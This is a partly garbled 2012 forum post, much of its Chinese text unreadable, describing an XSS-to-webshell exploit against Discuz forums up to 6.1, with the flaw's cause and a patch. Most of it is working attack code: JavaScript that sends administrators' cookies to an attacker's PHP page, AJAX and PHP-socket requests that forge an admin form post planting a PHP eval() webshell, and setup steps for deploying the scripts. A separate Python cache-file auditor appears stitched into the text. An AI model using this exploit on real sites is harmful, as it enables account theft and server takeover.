admin 2012-9-13 17:11:49

Discuz XSSwebshell

By racle @tian6.com
Reposting is welcome; please keep the copyright notice.
Affected versions: Discuz <= 6.1.0, gbk+utf+big5

ȫJSð汾,ֻһļ.ajax-racle.js.Ч汾DZ6.1(7.0汾,6.1ϰ汾ѾĬϴϲ),汾ж,ԷΪIEFIREFOXЧ.


3ǰ̳ʹ,˵Discuzи̳ʼ˻WEBSHELL©,superheiǰһDISCUZ©֮һ.ԭ:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
ʱ˵һŪ,ʵһӴ,©ҪԱ̨Ȩ,Ҫ㷺ձûǺܸӵ,Ҫ¼,ϵŻ깤.

дEXPĹ,õt0by57,SuperheiĴ.PHPJSŶ!ϣҿƪʱ,ע׵Ĺ,ϾXSSĿǰWEBȫͷϷ.ʽ:XSIO,Cross Iframe Trick,crsfȵ..
һFLASH XSSӦ÷:Discuzshell-Flash XSS


----------------------------------------------------------ǰԷָ-----------------------------------------------------------------------------


problem1: the vulnerable page runwizard.inc.php only accepts POST, so a POST submission has to be simulated.

problem2: the Discuz forum checks the Referer on submission, so one has to be forged as well, either with a PHP socket or from JS.

problem3:formhash()û++XXX㷨ó,û취ģ,ֺķһʱ,뵽ɵ취,Դ.Ǻ.DzοsuperheiһEXP.


First, a brief explanation of the cause of the vulnerability and how to fix it. The vulnerable file is bbs/admin/runwizard.inc.php, which contains this function:

function saverunwizardhistory() {
      global $runwizardfile, $runwizardhistory;
      $fp = fopen($runwizardfile, 'w');
      fwrite($fp, serialize($runwizardhistory));
      fclose($fp);
}
serialize($runwizardhistory) is written straight into $fp. What is runwizardhistory? It is some forum information such as the forum name, corresponding to the forum settings in the admin panel at: discuz.com/bbs/admincp.php?action=runwizard&step=2. The forum name and the other fields are not filtered at all. Write a one-line shell into any of these fields, submit, and it is saved into the cache file: bbs/forumdata/logs/runwizardlog.php.
The fix:

function saverunwizardhistory() {
      global $runwizardfile, $runwizardhistory;
      $fp = fopen($runwizardfile, 'w');
      $s = '<?php exit;?>';
      $s .= serialize($runwizardhistory);
      fwrite($fp, $s);
      fclose($fp);
}
With '<?php exit;?>' written first, PHP exits as soon as the file is requested, so even if a one-line shell has been written into it, it is never executed.
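As an added example (not code from the original post), a small checker a forum admin can run over runwizardlog.php: it verifies that the exit guard from the fix above is in place and flags any PHP tag that was written into the serialized settings. The sample file contents are constructed.

```python
"""Audit a Discuz runwizard cache file (bbs/forumdata/logs/runwizardlog.php).

Added example, not code from the original post. It checks the two things the
fix above depends on: the file must begin with the '<?php exit;?>' guard, and
no PHP open tag should have been written into the serialized wizard settings.
"""
import re
from typing import Dict, List

EXIT_GUARD = b"<?php exit;?>"
# s:LEN:"..." entries of PHP serialize(); LEN is a byte count, hence bytes.
STR_RE = re.compile(rb's:(\d+):"')
# PHP open tags, plus the legacy <script language="php"> and ASP-style forms.
PHP_TAG = re.compile(rb'<\?|<%|<script[^>]*language\s*=\s*["\']?php', re.I)


def php_strings(blob: bytes) -> List[bytes]:
    """Extract every string value from a serialize() blob without unserializing.
    The length prefix is authoritative, so values containing quotes, semicolons
    or even nested s:N:" sequences are sliced correctly."""
    out: List[bytes] = []
    pos = 0
    while (m := STR_RE.search(blob, pos)):
        n = int(m.group(1))
        start = m.end()
        out.append(blob[start:start + n])
        pos = start + n + 2          # skip the closing quote and ';'
    return out


def audit(content: bytes) -> Dict[str, object]:
    """Classify the cache file: ok / unpatched / tampered / exploitable."""
    guarded = content.startswith(EXIT_GUARD)
    payload = content[len(EXIT_GUARD):] if guarded else content
    injected = [s for s in php_strings(payload) if PHP_TAG.search(s)]
    if injected and not guarded:
        verdict = "exploitable"      # the tag is reachable via the URL
    elif injected:
        verdict = "tampered"         # blocked by the guard, but someone tried
    elif not guarded:
        verdict = "unpatched"
    else:
        verdict = "ok"
    return {"guarded": guarded, "injected": injected, "verdict": verdict}


# Constructed sample files (not real forum data); the tag is an inert echo.
PATCHED = b'<?php exit;?>a:1:{s:6:"bbname";s:6:"Discuz";}'
INJECTED = b'a:1:{s:8:"sitename";s:15:"<?php echo 1;?>";}'

if __name__ == "__main__":
    for sample in (PATCHED, INJECTED, EXIT_GUARD + INJECTED):
        print(audit(sample)["verdict"])
```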



----------------------------------------©ij÷ָ-----------------------------------------------------------------------------


Ǹ©ij÷.ҿ,ҲΪǸ©˰,ҪйԱȨ,к̨Ȩ,ȻWEBSHELL,ʵ˵,к̨Ȩ,SHELLİ취Ҳֹһ.ļֵ,Ͳ.Ȼ,ѾndayұҪص.Ҫߴ,XSS,Crsfͱ©İ취.öֵʹܶ.

ǵ˼·:̳иxss,Crsf flash(ȷ,Discuz! member.php xss bug,Discuz! ݿϢxss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz! xss bug),Ա,ִǵJS,ⲿһJS,ͨJSCOOKIES,HASH,Ȼ󾭹ⲿһPHPװSOCKETPOSTʽύǰ˵Ķ,̳ûвϸ(Ŀǰû̳.Ȼ,Ѿ.^^),ôͻbbs/forumdata/logs/runwizardlog.phpWEBSHELL.

ƪҪǸҸEXP,ȻôŵҺڵ,Ҫǽ,˼·.Ϊѧʲ.

Ҫ,ôͨJS,ùԱCOOKIES,ȻCOOKIESݸύPHP.õİ취ŴҶ֪,Ǵݵİ취,ƩͼƬʽ,ͷdzȶʵ.ʵAJAXԵPHPĺð취.JSִ:

var url="http://Ŀվ/admincp.php";

/*cookies*/
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}

getURL("õĽcookies.php?x="+encodeURIComponent(document.cookie));// pass it to php via an image request
On the PHP side it is simply received via GET:

$cookies=$_GET['x'];
ͬ,hashҲôPHP.HASHĻ÷ҲǺ˼,֪,discuzformhashÿȨʵΨһ.ҲԷ,̳ҳû˳ĵط,hash.Ҫ,ǴҳԴļhash,ɸѡ,ݸPHP.ɸѡİ취ܶ,ȤĻ,ԿҵɸѡJS(discuzʵһ,Ǻ) :)


Once the cookies and the hash are obtained, what remains is to simulate the submission. Below is the AJAX submission I wrote earlier:

var url="http://tian6.com/raclebbs/";

/*hash*/
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
xmlHttpReq.send();
var resource = xmlHttpReq.responseText;
var numero = resource.search(/formhash/);
var formhash=encodeURIComponent(resource.substr(numero+17,8));

var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST)%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//ҪЯ
xmlHttpReq.open("POST",url+"admincp.php?action=runwizard&step=3",false);//ʹPOSTһӣ첽ʽͨ
xmlHttpReq.setRequestHeader("Referer", url);
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
xmlHttpReq.setrequestheader("content-length",post.length);
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
xmlHttpReq.send(post);//
HASHҼȷ,ύ,Ҳcookies

Now the PHP SOCKET way of submitting:

$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST)%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';

fwrite($sock, "POST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
fwrite($sock, $data);

$headers = "";
while ($str = trim(fgets($sock, 4096)))
   $headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
   $body .= fgets($sock, 4096);
fclose($sock);
echo $body;
©XSSӦô,渽JSļ,PHPװõύļ.ļһ,עûſ,Ҳûϵ,ϸǰķ,Ҳд.^^


-------------------------------------------XSSļָ-----------------------------------------------------------------------------


1: PHP SOCKET method. First open racle.js:

var url="http://tian6.com/raclebbs/admincp.php?action=home"; //change to the target to be XSSed, e.g. http://www.discuz.com/admincp.php?action=home

Then open racle@tian6.php:

$url="racle@tian6.com";   //change to the target to be XSSed, e.g. www.discuz.com



If the target forum is version 6.1, nothing needs changing. If the target is version 6.0 or earlier, change:

getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));

to

getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
2: JS method. Open ajax-racle.js and change var url="http://tian6.com/raclebbs/"; to the address of the forum.



If the target forum is version 6.1, nothing needs changing. If the target is version 6.0 or earlier, change:

var formhash=encodeURIComponent(resource.substr(numero+17,8));

to

var formhash=encodeURIComponent(resource.substr(numero+9,8));
ok.ַһ.ڹǰ,Ӧȿ̳ϲû,ԳԷ:http://target.com/bbs/forumdata/logs/runwizardlog.php,һƬհ,ǾûϷ.ǿհ׾ͻЩ̳Ϣ,ҲͿ϶©,Ϊ˼Ҳ֮ûи¹̳Ϣ.Ŀǰ˵,8ɰհ.

ǵһַ,Ͱracle.js,racle@tian6.phpļϴһִPHPĵط,ƩǰµWEBSHELL.ļͬһĿ¼.ǵøÿռҪ֧PHP.Ȼ̳<script src=http://źõĵط/racle.js></script>XSS.

ǵڶַ,Ͱajax-racle.js,ϴһǰµWEBSHELL,Ȼ̳<script src=http://źõĵط/ajax-racle.js></script>XSS.

ʲô,ȵԱһӻһ̳,̳bbs/forumdata/logs/runwizardlog.phpͶ˸<?php eval($_POST)?> ^^.Ͻÿƶȥ.
